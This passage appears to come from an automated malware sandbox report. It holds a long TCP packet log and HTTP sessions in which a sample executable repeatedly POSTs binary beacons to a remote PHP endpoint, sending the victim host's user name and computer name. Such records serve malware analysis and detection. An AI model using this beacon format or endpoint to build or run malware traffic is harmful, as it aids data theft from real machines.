                            Dec 9, 2024 08:52:44.776232004 CET804987394.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:44.776288033 CET804987394.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:44.776413918 CET4987380192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:44.776513100 CET4987380192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:44.895864010 CET804987394.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:44.913305998 CET4987980192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:45.032720089 CET804987994.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:45.032897949 CET4987980192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:45.035027981 CET4987980192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:45.154429913 CET804987994.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:45.154565096 CET4987980192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:45.274235010 CET804987994.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:46.592494965 CET804987994.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:46.592547894 CET804987994.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:46.592674971 CET4987980192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:46.592731953 CET4987980192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:46.712064028 CET804987994.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:46.741947889 CET4988580192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:46.861290932 CET804988594.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:46.861433029 CET4988580192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:46.863600016 CET4988580192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:46.983052015 CET804988594.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:46.983185053 CET4988580192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:47.102931023 CET804988594.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:48.268328905 CET804988594.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:48.268433094 CET804988594.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:48.268573999 CET4988580192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:48.268610954 CET4988580192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:48.387942076 CET804988594.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:48.415131092 CET4988880192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:48.536098003 CET804988894.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:48.537234068 CET4988880192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:48.539252043 CET4988880192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:48.658571959 CET804988894.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:48.658726931 CET4988880192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:48.778111935 CET804988894.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:50.978399992 CET804988894.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:50.978503942 CET4988880192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:50.978569031 CET804988894.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:50.978619099 CET4988880192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:51.098177910 CET804988894.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:51.115389109 CET4989680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:51.234834909 CET804989694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:51.234973907 CET4989680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:51.237061977 CET4989680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:51.356970072 CET804989694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:51.358824968 CET4989680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:51.478090048 CET804989694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:52.650873899 CET804989694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:52.650984049 CET804989694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:52.651034117 CET4989680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:52.651375055 CET4989680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:52.770278931 CET804989694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:52.786223888 CET4990080192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:52.905798912 CET804990094.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:52.905955076 CET4990080192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:52.908112049 CET4990080192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:53.027426958 CET804990094.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:53.027579069 CET4990080192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:53.146955967 CET804990094.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:54.731537104 CET804990094.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:54.731672049 CET804990094.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:54.731708050 CET4990080192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:54.731755018 CET4990080192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:54.851047039 CET804990094.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:54.867702007 CET4990680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:54.987010956 CET804990694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:54.987135887 CET4990680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:54.989228964 CET4990680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:55.108503103 CET804990694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:55.108776093 CET4990680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:55.228079081 CET804990694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:56.395785093 CET804990694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:56.395833969 CET804990694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:56.395944118 CET4990680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:56.395992041 CET4990680192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:56.515239000 CET804990694.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:56.549093008 CET4991180192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:56.668487072 CET804991194.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:56.668579102 CET4991180192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:56.670968056 CET4991180192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:56.790288925 CET804991194.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:56.790419102 CET4991180192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:56.909746885 CET804991194.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:58.223550081 CET804991194.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:58.223752022 CET804991194.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:58.223872900 CET4991180192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:58.223872900 CET4991180192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:58.343275070 CET804991194.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:58.369246006 CET4991780192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:58.488537073 CET804991794.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:58.488660097 CET4991780192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:58.490883112 CET4991780192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:58.611356974 CET804991794.156.177.41192.168.2.6
                            Dec 9, 2024 08:52:58.611498117 CET4991780192.168.2.694.156.177.41
                            Dec 9, 2024 08:52:58.730906963 CET804991794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:00.043214083 CET804991794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:00.043296099 CET804991794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:00.043307066 CET4991780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:00.043363094 CET4991780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:00.162703037 CET804991794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:00.178266048 CET4992480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:00.297492027 CET804992494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:00.297667980 CET4992480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:00.300306082 CET4992480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:00.419594049 CET804992494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:00.419701099 CET4992480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:00.539016008 CET804992494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:01.856334925 CET804992494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:01.856404066 CET804992494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:01.856477022 CET4992480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:01.856515884 CET4992480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:01.975965023 CET804992494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:02.000690937 CET4992980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:02.120754004 CET804992994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:02.122827053 CET4992980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:02.125020027 CET4992980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:02.244359016 CET804992994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:02.244479895 CET4992980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:02.363857985 CET804992994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:03.676702023 CET804992994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:03.676806927 CET804992994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:03.676877022 CET4992980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:03.680150986 CET4992980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:03.799477100 CET804992994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:03.822750092 CET4993580192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:03.942233086 CET804993594.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:03.942325115 CET4993580192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:03.944591999 CET4993580192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:04.064269066 CET804993594.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:04.064838886 CET4993580192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:04.186542034 CET804993594.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:05.342324972 CET804993594.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:05.342408895 CET804993594.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:05.342474937 CET4993580192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:05.342498064 CET4993580192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:05.461783886 CET804993594.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:05.490586042 CET4993780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:05.609843016 CET804993794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:05.610009909 CET4993780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:05.612095118 CET4993780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:05.731542110 CET804993794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:05.731668949 CET4993780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:05.851191044 CET804993794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:07.013528109 CET804993794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:07.013586044 CET804993794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:07.013704062 CET4993780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:07.013756990 CET4993780192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:07.133138895 CET804993794.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:07.163738012 CET4994380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:07.283426046 CET804994394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:07.283668995 CET4994380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:07.285778999 CET4994380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:07.405164003 CET804994394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:07.405384064 CET4994380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:07.525974989 CET804994394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:08.848110914 CET804994394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:08.848304987 CET4994380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:08.856712103 CET804994394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:08.856806040 CET4994380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:08.967741966 CET804994394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:08.991066933 CET4994980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:09.110415936 CET804994994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:09.110728025 CET4994980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:09.112591982 CET4994980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:09.231928110 CET804994994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:09.232228994 CET4994980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:09.351566076 CET804994994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:10.512737036 CET804994994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:10.512790918 CET804994994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:10.512942076 CET4994980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:10.512985945 CET4994980192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:10.632378101 CET804994994.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:10.647875071 CET4995480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:10.767463923 CET804995494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:10.767733097 CET4995480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:10.769613981 CET4995480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:10.889054060 CET804995494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:10.889178038 CET4995480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:11.010634899 CET804995494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:12.323381901 CET804995494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:12.323432922 CET804995494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:12.323601961 CET4995480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:12.323654890 CET4995480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:12.442924976 CET804995494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:12.461359024 CET4996080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:12.580708981 CET804996094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:12.580964088 CET4996080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:12.583204985 CET4996080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:12.702467918 CET804996094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:12.702697039 CET4996080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:12.822093010 CET804996094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:14.137646914 CET804996094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:14.137681007 CET804996094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:14.137919903 CET4996080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:14.137972116 CET4996080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:14.257210016 CET804996094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:14.277133942 CET4996280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:14.396552086 CET804996294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:14.396672010 CET4996280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:14.398693085 CET4996280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:14.518070936 CET804996294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:14.518188953 CET4996280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:14.637721062 CET804996294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:15.952080965 CET804996294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:15.952147007 CET804996294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:15.952240944 CET4996280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:15.952277899 CET4996280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:16.072199106 CET804996294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:16.103768110 CET4996880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:16.223217010 CET804996894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:16.223428965 CET4996880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:16.225502968 CET4996880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:16.345463991 CET804996894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:16.345760107 CET4996880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:16.465970993 CET804996894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:17.623614073 CET804996894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:17.623688936 CET804996894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:17.623735905 CET4996880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:17.623753071 CET4996880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:17.742969990 CET804996894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:17.777182102 CET4997380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:17.896614075 CET804997394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:17.896893024 CET4997380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:17.899074078 CET4997380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:18.018348932 CET804997394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:18.018611908 CET4997380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:18.138135910 CET804997394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:19.453425884 CET804997394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:19.453522921 CET804997394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:19.453533888 CET4997380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:19.453567028 CET4997380192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:19.572994947 CET804997394.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:19.604855061 CET4997880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:19.724317074 CET804997894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:19.725060940 CET4997880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:19.736536980 CET4997880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:19.855895042 CET804997894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:19.857048035 CET4997880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:19.976450920 CET804997894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:21.134187937 CET804997894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:21.134282112 CET4997880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:21.134329081 CET804997894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:21.134361982 CET4997880192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:21.253639936 CET804997894.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:21.271950960 CET4998480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:21.391271114 CET804998494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:21.392899990 CET4998480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:21.394958019 CET4998480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:21.514256001 CET804998494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:21.514620066 CET4998480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:21.633913040 CET804998494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:23.236313105 CET804998494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:23.236330986 CET804998494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:23.236387968 CET4998480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:23.236453056 CET4998480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:23.356465101 CET804998494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:23.385150909 CET4999080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:23.505816936 CET804999094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:23.505970955 CET4999080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:23.508372068 CET4999080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:23.627652884 CET804999094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:23.627768993 CET4999080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:23.747055054 CET804999094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:25.096241951 CET804999094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:25.096340895 CET804999094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:25.096431017 CET4999080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:25.096472025 CET4999080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:25.215863943 CET804999094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:25.238718987 CET4999480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:25.357995033 CET804999494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:25.358169079 CET4999480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:25.359930992 CET4999480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:25.479182959 CET804999494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:25.479289055 CET4999480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:25.599019051 CET804999494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:26.917603970 CET804999494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:26.917680025 CET804999494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:26.917838097 CET4999480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:26.917839050 CET4999480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:27.037389040 CET804999494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:27.053078890 CET5000080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:27.172558069 CET805000094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:27.172637939 CET5000080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:27.174834967 CET5000080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:27.294116974 CET805000094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:27.294179916 CET5000080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:27.413410902 CET805000094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:31.731527090 CET805000094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:31.731637001 CET805000094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:31.731754065 CET5000080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:31.733094931 CET5000080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:31.852428913 CET805000094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:32.009825945 CET5001480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:32.129581928 CET805001494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:32.129676104 CET5001480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:32.131978989 CET5001480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:32.251317978 CET805001494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:32.251367092 CET5001480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:32.370615005 CET805001494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:34.080187082 CET805001494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:34.080310106 CET805001494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:34.080463886 CET5001480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:34.080560923 CET5001480192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:34.199826956 CET805001494.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:34.224349976 CET5002080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:34.343770981 CET805002094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:34.343919039 CET5002080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:34.345973969 CET5002080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:34.465197086 CET805002094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:34.465270996 CET5002080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:34.585028887 CET805002094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:38.905452013 CET805002094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:38.905478954 CET805002094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:38.905570030 CET5002080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:38.905611992 CET5002080192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:39.024900913 CET805002094.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:39.051894903 CET5003280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:39.171251059 CET805003294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:39.174989939 CET5003280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:39.177046061 CET5003280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:39.296312094 CET805003294.156.177.41192.168.2.6
                            Dec 9, 2024 08:53:39.296364069 CET5003280192.168.2.694.156.177.41
                            Dec 9, 2024 08:53:39.415671110 CET805003294.156.177.41192.168.2.6
                            • 94.156.177.41
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.64970794.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:39.446641922 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 188
                            Connection: close
                            Dec 9, 2024 08:51:39.566096067 CET188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: 'ckav.ruengineer494126ENGINEER-PCk0FDD42EE188E931437F4FBE2CzPvPa
                            Dec 9, 2024 08:51:40.997716904 CET185INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:40 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.64970894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:41.268788099 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 188
                            Connection: close
                            Dec 9, 2024 08:51:41.388226032 CET188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: 'ckav.ruengineer494126ENGINEER-PC+0FDD42EE188E931437F4FBE2CtvEF5
                            Dec 9, 2024 08:51:43.111928940 CET185INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.64971094.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:43.374638081 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
